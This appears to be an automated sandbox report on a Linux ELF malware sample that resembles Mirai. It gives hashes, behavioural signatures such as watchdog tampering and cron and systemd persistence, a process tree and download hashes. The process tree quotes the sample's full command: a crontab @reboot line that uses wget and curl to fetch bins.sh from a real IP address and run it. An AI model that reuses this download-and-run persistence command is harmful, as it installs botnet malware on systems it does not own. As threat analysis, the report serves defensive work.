Analysis
- max time kernel: 141s
- max time network: 154s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20231215-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20231215-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 08/01/2024, 03:41
Static task: static1
Behavioral task: behavioral1
Sample: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
Resource: ubuntu1804-amd64-20231215-en
General
- Target: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
- Size: 64KB
- MD5: ccdcabc06ed12d315440fabad4c0e7a9
- SHA1: 08603a1dc5aded6cd1d271a4d8d57bccb5c64495
- SHA256: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff
- SHA512: 2ff4c9983ab2addab390bca1dd34fe88c36d51028723d58a3ba742e8cb86a39e175f6dabb04c9960f2db84f17c5fc067eb8afa8119bf3bd6e498f22da6eadda2
- SSDEEP: 1536:a3NvZJP6+ckhKHOBXygfki1An01Y0ff7VuCRerRY:kNhJS+YOBNMi1W0yYjAwKY
Malware Config
Signatures
- Changes its process name (1 IoC)
  Changes the process name, possibly in an attempt to hide itself.
  IoC: /bin/busybox | PID: 1525 | Process: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
- Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.
  File opened for modification: /dev/watchdog | Process: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
  File opened for modification: /dev/misc/watchdog | Process: 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule and is commonly used for malware persistence.
  File opened for modification: /var/spool/cron/crontabs/tmp.uIfVKk | Process: crontab
- Creates/modifies environment variables (1 TTP, 1 IoC)
  Creating or modifying environment variables is a common persistence mechanism.
  File opened for modification: /root/.bashrc
- Enumerates active TCP sockets (1 TTP, 1 IoC)
  Gets active TCP sockets from the /proc virtual filesystem.
  File opened for reading: /proc/net/tcp
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Modifies systemd (1 TTP, 1 IoC)
  Adds or modifies systemd service files, likely to achieve persistence.
  File opened for modification: /lib/systemd/system/bot.service
- Modifies Bash startup script (1 TTP, 1 IoC)
  File opened for modification: /root/.bashrc
- Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of the /proc filesystem to enumerate network settings.
  File opened for reading: /proc/net/tcp
- Reads runtime system information (64 IoCs)
  Reads data from the /proc virtual filesystem.
  Files opened for reading: /proc/532/fd, /proc/947/stat, /proc/1065/stat, /proc/170/stat, /proc/168/cmdline, /proc/265/stat, /proc/1141/cmdline, /proc/34/cmdline, /proc/1519/stat, /proc/1520/cmdline, /proc/1557/stat, /proc/156/stat, /proc/78/fd, /proc/1255/fd, /proc/28/fd, /proc/17/fd, /proc/24/stat, /proc/84/stat, /proc/1547/fd, /proc/1556/stat, /proc/14/stat, /proc/1111/cmdline, /proc/1088/cmdline, /proc/30/fd, /proc/154/stat, /proc/1136/stat, /proc/1190/cmdline, /proc/1290/fd, /proc/27/stat, /proc/82/fd, /proc/162/fd, /proc/171/stat, /proc/1112/stat, /proc/2/fd, /proc/254/cmdline, /proc/638/fd, /proc/160/stat, /proc/11/fd, /proc/83/fd, /proc/164/fd, /proc/332/cmdline, /proc/454/stat, /proc/1124/fd, /proc/1328/fd, /proc/9/cmdline, /proc/36/fd, /proc/1539/stat, /proc/34/stat, /proc/662/stat, /proc/26/fd, /proc/163/stat, /proc/711/cmdline, /proc/1120/fd, /proc/1164/stat, /proc/1520/stat, /proc/1552/cmdline, /proc/10/fd, /proc/460/cmdline, /proc/952/cmdline, /proc/1141/fd, /proc/1460/fd, /proc/1529/stat, /proc/1527/fd, /proc/79/cmdline
Processes
- /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf (command: /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf) | PID: 1525
  Signatures: Changes its process name; Modifies Watchdog functionality
- /bin/sh (command: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -") | PID: 1530
  - /usr/bin/crontab (command: crontab -) | PID: 1532
    Signatures: Creates/modifies Cron job
  - /bin/sh (command: sh bins.sh) | PID: 1531
- /usr/bin/crontab (command: crontab -l) | PID: 1533
- /bin/chmod (command: chmod +x bins.sh) | PID: 1534
- /bin/sh (command: sh bins.sh) | PID: 1535
- /bin/curl (command: /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh) | PID: 1536
- /bin/chmod (command: chmod +x bins.sh) | PID: 1537
- /bin/sh (command: sh -c "/bin/systemctl enable bot") | PID: 1538
  - /bin/systemctl (command: /bin/systemctl enable bot) | PID: 1539
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 368B
  MD5: d77308e381db6ea7245af6f3b7be118e
  SHA1: 0a0f20a03f4db351a404954c780eebd15b3775bb
  SHA256: feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b
  SHA512: 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4
- Filesize: 241B
  MD5: 2f16a50a03b078ad9d67f3835641e9fd
  SHA1: 8317001974fe8b4806e2377f4e62f9c74d588388
  SHA256: 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f
  SHA512: 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85